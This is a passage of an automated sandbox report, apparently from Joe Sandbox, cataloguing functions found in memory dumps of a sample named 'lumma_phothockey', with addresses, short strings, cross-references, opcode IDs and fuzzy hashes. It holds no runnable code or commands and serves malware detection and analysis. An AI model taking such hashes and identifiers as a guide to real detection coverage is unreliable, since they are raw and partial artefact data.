Opcode Fuzzy Hash: b74f9cf1b039c633b5e8a078892a246f2e281093ab191817ada14f2352cf6ccb
Instruction Fuzzy Hash: 54018B32D0060A9FDF10DFA9C8047EEBBF2AF88314F148419E565A72A0C7758861DF91

Function 073683E1 Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

@, xrefs: 073686A8

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 987264dbe81e3604541f2d8b7d46336d1cc807eb83702804fd06a8c08d42171e
Instruction ID: dcab0c3516dff538bd4bed45164b02990346bd51162341c65e19c48206323f4e
Opcode Fuzzy Hash: 987264dbe81e3604541f2d8b7d46336d1cc807eb83702804fd06a8c08d42171e
Instruction Fuzzy Hash: 80D1B1B4A05228CFDB60DF58D998BD9BBB5FB49300F1080EAD50DA7344DBB55E808F51

Function 07284CD0 Relevance: 1.5, Strings: 1, Instructions: 245COMMON

Download Yara Rule

Strings

Plq, xrefs: 07284EB8

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: Plq
API String ID: 0-3623438852
Opcode ID: b900d203af005661a6a1245f33c121a9cfb160856b4d5337399ee270fed94e42
Instruction ID: 90d272daaf244a291db7caf34a6ab921873e873a5dfca330be00566170ccc9cc
Opcode Fuzzy Hash: b900d203af005661a6a1245f33c121a9cfb160856b4d5337399ee270fed94e42
Instruction Fuzzy Hash: 10913570B102168FDB54EF29C484AAEBBF6BF89310B1141A9E505DB3B5DB71EC41CBA1

Function 07289118 Relevance: 1.5, Strings: 1, Instructions: 230COMMON

Download Yara Rule

Strings

4'q, xrefs: 07289342

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: af96f00736fce5098b292dc46a5d56edbc76622b0a6d2f40386ab73947560413
Instruction ID: 9aa69ad08028af0cff46a53e4650d4a1241569b8d6b4f82b807a284ac1cf3cfd
Opcode Fuzzy Hash: af96f00736fce5098b292dc46a5d56edbc76622b0a6d2f40386ab73947560413
Instruction Fuzzy Hash: F5A12E74A21218DFCB44EFA4D894AADB7B2FF88300F558159E4456B3A5DF31EC82CB81

Function 0724FC48 Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

(q, xrefs: 0724FCBC

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: f75b1285927caa458d64d29c265c1b3e87b078aec6353918c35c82eb4756c29d
Instruction ID: ab9f7d60b637f40637bcbe5c719d715bb79ab462c1065dfb7f1c0b32217d972c
Opcode Fuzzy Hash: f75b1285927caa458d64d29c265c1b3e87b078aec6353918c35c82eb4756c29d
Instruction Fuzzy Hash: 6571F1B1B10606CFCB14CF68D944AAABBB1FF8A310F198566E955DB381D734E842CBD0

Function 0728FC08 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

(q, xrefs: 0728FE29

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 81217f462c65ff7d007bfd85a54cfa0dac5d785d2f7c0de609543f9140659571
Instruction ID: 1eba2b545b22e54cb75a88d0d0f64a9bf100f89ae6e778bee18cbe5a9808305b
Opcode Fuzzy Hash: 81217f462c65ff7d007bfd85a54cfa0dac5d785d2f7c0de609543f9140659571
Instruction Fuzzy Hash: E3719E74B21614CFCB54FF64C494AADB3B6EF88700F508169D502AB3A4DF36AD42CB92

Function 072A2C08 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

TJq, xrefs: 072A2CE4

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: TJq
API String ID: 0-48878262
Opcode ID: 78ed282fb877210bf2f3ee4c73e5ac73f9bd5985866fbae93d3a523b0c183a1b
Instruction ID: 77645024560aed301acf2bbaba763f6d48fe13a6f636d5c42adffcf175895113
Opcode Fuzzy Hash: 78ed282fb877210bf2f3ee4c73e5ac73f9bd5985866fbae93d3a523b0c183a1b
Instruction Fuzzy Hash: 8971C5B4E14208DFDB44DFA8E4986EEBBF2FB89300F208069E515AB354DB785945CF51

Function 072A2BF8 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

TJq, xrefs: 072A2CE4

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: TJq
API String ID: 0-48878262
Opcode ID: 6783854f7a18bedfa4237a24c750098d8df3136e4818263e9efa8a617c1fbe1d
Instruction ID: f66a59d372ac7bf7aef0e41dd741e1556c43678206551ff8bd2138d8cd1155e9
Opcode Fuzzy Hash: 6783854f7a18bedfa4237a24c750098d8df3136e4818263e9efa8a617c1fbe1d
Instruction Fuzzy Hash: F271C3B4E14208DFDB44DFA8E4986EEBBF2FB89300F208069E505AB354DB785945CF91

Function 0724EC88 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

pq, xrefs: 0724ED38

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: pq
API String ID: 0-153521182
Opcode ID: 976544e0e36ce984bb2fad5784bc733eb995af2fba1f0cdee400c9b0aac6a599
Instruction ID: b0e7c2137ca680141c8d44e3aa8a439fac392982a37735e979c616db735c73ce
Opcode Fuzzy Hash: 976544e0e36ce984bb2fad5784bc733eb995af2fba1f0cdee400c9b0aac6a599
Instruction Fuzzy Hash: 95515176600104AFDB499FA9D915D59BBB3FF8D3147198098E2098B372DB32DC22EB91

Function 07368426 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

@, xrefs: 073686A8

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 55697f688ef0d1911f46dc124df45854a52e35c0f4ecc2ad7d8d612a95c0ddd9
Instruction ID: 766ea3b620e67b1efe85d194f3a304e453bcd94e451c34f3e1ce9855ebc46429
Opcode Fuzzy Hash: 55697f688ef0d1911f46dc124df45854a52e35c0f4ecc2ad7d8d612a95c0ddd9
Instruction Fuzzy Hash: 4371D4B4A05228CFEB20DF58E998BEAB7B5FB49300F1090E6D509A7344C7755E80CF51

Function 0728DE18 Relevance: 1.4, Strings: 1, Instructions: 150COMMON

Download Yara Rule

Strings

(q, xrefs: 0728DF44

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: ac4d82aa836068620b6918eecb809075b9b002483f8a8c043f11501c855fdba7
Instruction ID: 6b2dd9868d3dde1fc775980fbf812ff9cb265cf6e5ec72160ebe608314120e4f
Opcode Fuzzy Hash: ac4d82aa836068620b6918eecb809075b9b002483f8a8c043f11501c855fdba7
Instruction Fuzzy Hash: E4517076714244AFC7069FA8D814E59BFB6FF8931071980E6E205CF2B2CA36D815DB51

Function 0728CDB8 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

4'q, xrefs: 0728CE02

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 2f0d6a6c6b87dbfa8dc6354401fb63b3e97d1adeae61c0ca2b3c065b0642081d
Instruction ID: 447fc06aff06c1480237bfde433db5b83f67a47e3e77d2f727106140fa3c9158
Opcode Fuzzy Hash: 2f0d6a6c6b87dbfa8dc6354401fb63b3e97d1adeae61c0ca2b3c065b0642081d
Instruction Fuzzy Hash: FD41B574B312148FCB54BB64C454AAEB7BBAFC9700F54401AD006AB3D4CF75AC46CBA2

Function 07289529 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

4'q, xrefs: 072894A1

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: bc13e3b602de67e46d226a5a018310208e1f27479f2944c6dc389ea2e54d01ee
Instruction ID: 437d8b1f58cf8d7a1bba8fe1b0832d27e89637f3a275b0fe048279185a6dbfc7
Opcode Fuzzy Hash: bc13e3b602de67e46d226a5a018310208e1f27479f2944c6dc389ea2e54d01ee
Instruction Fuzzy Hash: 07410674B11215DFDB48DB64D594BADBBB2FF89700F244198E5469B3A1CB72EC82CB80

Function 0724F538 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

(q, xrefs: 0724F588

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 2aba557d1a4e873ed4c4013d3f81ad4ceda9ada85d80696da8a653e4ac236e35
Instruction ID: 1099ab40050a849622dd14506c23026b9b3963a743832fdddf8bc9e2c445ab57
Opcode Fuzzy Hash: 2aba557d1a4e873ed4c4013d3f81ad4ceda9ada85d80696da8a653e4ac236e35
Instruction Fuzzy Hash: DB2128767042426FD7195F68E844AAF7BA6EFC9360B14413AEA09CB760CF318C12C790

Function 0728819A Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

4'q, xrefs: 072881E1

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: e21beee7a4da5088889aff7749694064811b0d60be2d6e266657dddb8850149d
Instruction ID: 85055159b08f6963842cabcb55237306d7aa8a32ee7fb74ff6b45f8937c1cc6a
Opcode Fuzzy Hash: e21beee7a4da5088889aff7749694064811b0d60be2d6e266657dddb8850149d
Instruction Fuzzy Hash: 0031B431610204DFCF549F94D844999BBA7EF8C310B1940A5EA069B365CE32EC52CB91

Function 072838B0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

p<q, xrefs: 072838FA

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: p<q
API String ID: 0-3896934649
Opcode ID: 696e37a700083cd53112bb8bc3dfb09d7c73058f0c66c2c7b2cfd4659f6471d5
Instruction ID: 8b849e2ba7de549180d7e670eaf79baf7ab49e2457306ea9c19bfe7b6a975fee
Opcode Fuzzy Hash: 696e37a700083cd53112bb8bc3dfb09d7c73058f0c66c2c7b2cfd4659f6471d5
Instruction Fuzzy Hash: D22192B1305296DFDB11DF2AC840AAA7FF5AF4A610F094096FC54CB2A2CA36DC50CB70

Function 07280BA0 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

,q, xrefs: 07280C13

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: 28e5f5dd4f0e9eca3c9d9e8cf979aaf23b749a920e362323946c4582d4dd3abe
Instruction ID: 9732624d7d86ac193af46fa390142870f00569970e7d1d70b0183a3347fae31c
Opcode Fuzzy Hash: 28e5f5dd4f0e9eca3c9d9e8cf979aaf23b749a920e362323946c4582d4dd3abe
Instruction Fuzzy Hash: 2E21BE71B012068FCB14DF69C894AAEBBF5EF85300F2580A5E905DB3A1D731ED01CBA1

Function 07369C49 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

h`, xrefs: 07369D9F

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: h`
API String ID: 0-268853866
Opcode ID: 094f672e34b85fef14dc2a57f2db05de122857f9029901230f5c4d7f7439584d
Instruction ID: edf1cffd97570540739baeb1384f7d03273b6469ec4c4a048c65ada4363af361
Opcode Fuzzy Hash: 094f672e34b85fef14dc2a57f2db05de122857f9029901230f5c4d7f7439584d
Instruction Fuzzy Hash: 0F1119B5B0415CDFEB54DBD8D84DBADBBB1FB49301F108429E506AB688C7706C41CB40

Function 072A8AC6 Relevance: 1.3, Strings: 1, Instructions: 26COMMON

Download Yara Rule

Strings

`, xrefs: 072A8B2D

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: e412c6d84ab65cbee469df38d6165459f3981a5f7d2aa8e14fd0f890092a6d1f
Instruction ID: 15f5b0d511f015c3b96de34699a9cb946df08728007d9ac0282dbb1e4668efb9
Opcode Fuzzy Hash: e412c6d84ab65cbee469df38d6165459f3981a5f7d2aa8e14fd0f890092a6d1f
Instruction Fuzzy Hash: 9DF0C4B4E24268EFDB51DF24E894ADDB7B1FB4A300F5045EAD40AA3250DB715E90CF42

Function 07242BED Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

+, xrefs: 07242BB1

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: c318243c15cfee537190e5f730be0f20c61584856c0d33edd472383d7d7037a6
Instruction ID: 53edc91756da1d27aade82c2a9c9d22ea9995f56feeb6928dc76a3f0486168c1
Opcode Fuzzy Hash: c318243c15cfee537190e5f730be0f20c61584856c0d33edd472383d7d7037a6
Instruction Fuzzy Hash: 5EF039B4828258CFDF14CF25EC49B9DBBF5FB0A304F6051AEE046B3251C3749881CA09

Function 07242B7A Relevance: 1.3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

Strings

+, xrefs: 07242BB1

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: 4f0d5286574a9834b21a822c1e44f231b422392cb031ad32a5c60722623e770f
Instruction ID: 759ac595daf0442a2e76f10fca068e659c2b23b1825f2d650431048f0e332e51
Opcode Fuzzy Hash: 4f0d5286574a9834b21a822c1e44f231b422392cb031ad32a5c60722623e770f
Instruction Fuzzy Hash: 86D017B8924209CFCB20CFA4EC29789BBF1BB0A301F104186E415A3202D7789880CB50

Function 072A8B39 Relevance: 1.3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

Strings

F, xrefs: 072A8B62

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 39534ef307f6ea0096e698a49e1366727d6b47890b8779a09b66a516d7e26c6d
Instruction ID: 8663069b0b9f419316586cb4dd168aa621bca6394a6c973d0024f7c82a8de7c8
Opcode Fuzzy Hash: 39534ef307f6ea0096e698a49e1366727d6b47890b8779a09b66a516d7e26c6d
Instruction Fuzzy Hash: 34E092B4D24328EFCB22CFA4D880A9DBBB5BF06300F1050E9E409A2241D7355A81CF42

Function 07242B85 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

+, xrefs: 07242BB1

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: +
API String ID: 0-2126386893
Opcode ID: e9be403e6da14eb931bc9b911fdf1c8f1fef3c160e21d0ce912d54f879dd8c70
Instruction ID: 5516f630be5c71a2f254f0e59fd3eb2e5db4f7f5ccb935bd99f9947c0d4cf821
Opcode Fuzzy Hash: e9be403e6da14eb931bc9b911fdf1c8f1fef3c160e21d0ce912d54f879dd8c70
Instruction Fuzzy Hash: 16D05E74E0810C8BCB10DF64E8487DE77B2FB49300F104189D00563240C7B89C80CF50

Function 072AA9BD Relevance: 1.3, Strings: 1, Instructions: 10COMMON

Download Yara Rule

Strings

M, xrefs: 072AA9E6

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: d649a9fb29581c7e6e7833ddfdb923ba9d9cfaa199cee0169125f3719fbb6308
Instruction ID: 1288576e66f35f0379eab246df36e0424c0727aeb774e3b21947e199c02efadc
Opcode Fuzzy Hash: d649a9fb29581c7e6e7833ddfdb923ba9d9cfaa199cee0169125f3719fbb6308
Instruction Fuzzy Hash: 99D06CB4921268CBEBA2CB14C898B8CB6B5AB45304F1042D9D40CA3250CBB05F808F05

Function 0728D008 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22287e1549e8562969781719cfaef06e54e67eb968984d79c97f44686fa58aa0
Instruction ID: 84ae121a31f8104a178814e536e0de2d95b2909c0be491f69f21054ff200d9ab
Opcode Fuzzy Hash: 22287e1549e8562969781719cfaef06e54e67eb968984d79c97f44686fa58aa0
Instruction Fuzzy Hash: 26122774B21219CFCB54EF64C894B9DB7B2BF89300F5085A8D44AAB395DB31ED89CB40

Function 07240C98 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5024b5809b0aa8c6b47e1378434747b728d08f7939f3ed4947db42bd5ffe16cd
Instruction ID: 93ac03238dfa7876fe815bb861402a33628a7a06d34340ca813daa54a4ac6a6d
Opcode Fuzzy Hash: 5024b5809b0aa8c6b47e1378434747b728d08f7939f3ed4947db42bd5ffe16cd
Instruction Fuzzy Hash: 15C1D5B4E25209CFDB24CF98D488BEDBBF5FB49300F108055DA0AAB285C7B89985CF55

Function 07240C88 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fcd07a2acc35519c14dcd8ced58da3bafd9493d8c95898e04c484811cd5bd1
Instruction ID: b7dfe156c703aa14f63f11030bfb200901441559b7cb7ca9e4c9943f4d13aa28
Opcode Fuzzy Hash: 41fcd07a2acc35519c14dcd8ced58da3bafd9493d8c95898e04c484811cd5bd1
Instruction Fuzzy Hash: 38B1D4B4E25249CFDB24CF98D484BEDBBF5FB4A300F108055DA0AAB285C7B89985CF55

Function 07280448 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14cf7dc7c6291156b0b337c0ac852e5f5c8390a14ca0dfcbe2441db10a0d4b9e
Instruction ID: ba3eb72d2ac44ed1e4903f2310bf05a5324693cccc23c59c048a8fe4bdc3cc09
Opcode Fuzzy Hash: 14cf7dc7c6291156b0b337c0ac852e5f5c8390a14ca0dfcbe2441db10a0d4b9e
Instruction Fuzzy Hash: 29A1D1B1B122168FDB14DFA4E455AADBBB2FF89311F148069E411AB3D0CB3ADD45CB60

Function 073679BA Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c33b542e253fc071260ab6b600d11957a66e6639cf27bf4e3f98d8df646912
Instruction ID: 311a1b18b281ad5fbd4ba4c4a52bebb66f92510de690aba62d83c2821e3d2ac6
Opcode Fuzzy Hash: 17c33b542e253fc071260ab6b600d11957a66e6639cf27bf4e3f98d8df646912
Instruction Fuzzy Hash: A651EEF76741569ABB21CAA8F40E5F83B64974023EBE4C547D40D5EB0EC121D3D38ADA

Function 072ABA30 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7651f73513d52fd5865cbf5e1006f8006a7348b84ba65f595223692f205d7c3a
Instruction ID: 6eba7c08b41875792c04858537cca434ff6d1f17a33c2f90e8b9aa79da397775
Opcode Fuzzy Hash: 7651f73513d52fd5865cbf5e1006f8006a7348b84ba65f595223692f205d7c3a
Instruction Fuzzy Hash: 53A1F7F4E2524DEFDB11DFA8E4986ADBBB2EB49310F10412AE406AB344CBB45985CF51

Function 0728CFF9 Relevance: .2, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322a11cc65078e1930d379f896baec544c3f0a262d58cc8abc216db3052bca91
Instruction ID: f45dbd518476a11ecd8d24f694042e6ab227669f9bb74781af53ffc12372f24c
Opcode Fuzzy Hash: 322a11cc65078e1930d379f896baec544c3f0a262d58cc8abc216db3052bca91
Instruction Fuzzy Hash: B8A118B4B112198FCB54EF24C894BA9B7B2BF89300F5485A8D54AAB395DF31ED85CF40

Function 0728DFB0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d477e24663a44e1841ddb2d9b9fc6a0f01d45d8fa9acfa7d2f3999f1b31572fc
Instruction ID: 226013b410060ff971715960ca12be74c4700443fb43ef7ad350bfacaa827701
Opcode Fuzzy Hash: d477e24663a44e1841ddb2d9b9fc6a0f01d45d8fa9acfa7d2f3999f1b31572fc
Instruction Fuzzy Hash: D7817C70B21215DFCB44EF68C894AADB7B6AF89700F1580A9E506DB3A1CB31EC41CB90

Function 07285A30 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 897b31d6a9c53d6464a0b21a5bc95c2660fe8807bfe2fa53bcc022a91fd4e87d
Instruction ID: 9965711b975f7818b72d8414f726566b7772102a429dceee2f7b1e1324480639
Opcode Fuzzy Hash: 897b31d6a9c53d6464a0b21a5bc95c2660fe8807bfe2fa53bcc022a91fd4e87d
Instruction Fuzzy Hash: A8812975A11619CFCB14EF69C484A9DBBF5FF88311B1581A9E8169B360DB31EC42CF90

Function 0728DFA1 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ceae45c9e1abcc697c46b45778698c1d2720472a0edf0c1afbd5f211779d1c13
Instruction ID: 50460ff575424fcd6e680b95bb46719e3ae8c95bd837280cb566371fa3c6f5af
Opcode Fuzzy Hash: ceae45c9e1abcc697c46b45778698c1d2720472a0edf0c1afbd5f211779d1c13
Instruction Fuzzy Hash: D6616074B21114DFCB44EF68C894AADB7B6FF89710F158199E506AB3A5CB31EC41CB90

Function 0724A6E8 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578027561.0000000007240000.00000040.00000800.00020000.00000000.sdmp, Offset: 07240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7240000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b30216225aecbc1e59b9483db2a82b7aff7207f16b15aa379b3373aa38fdca
Instruction ID: aa7c7cf3a46cd1c05109cd95a5158c908719823a33f6bf23d5a6c7a0c90044ce
Opcode Fuzzy Hash: b8b30216225aecbc1e59b9483db2a82b7aff7207f16b15aa379b3373aa38fdca
Instruction Fuzzy Hash: 5C71F774E04218DFDB14DFA9D98879EBBB2FB89300F10806AD909AB344DB785D45CF91

Function 0736AAE9 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfb0842f2806b272f526f3ca7c7d10a60a364bbf047eea06ee8f59c5f582e8b2
Instruction ID: 8055cab15f0677ab8a0926c1870cbebbc7a4bbf8963521983b2e600825009ddc
Opcode Fuzzy Hash: dfb0842f2806b272f526f3ca7c7d10a60a364bbf047eea06ee8f59c5f582e8b2
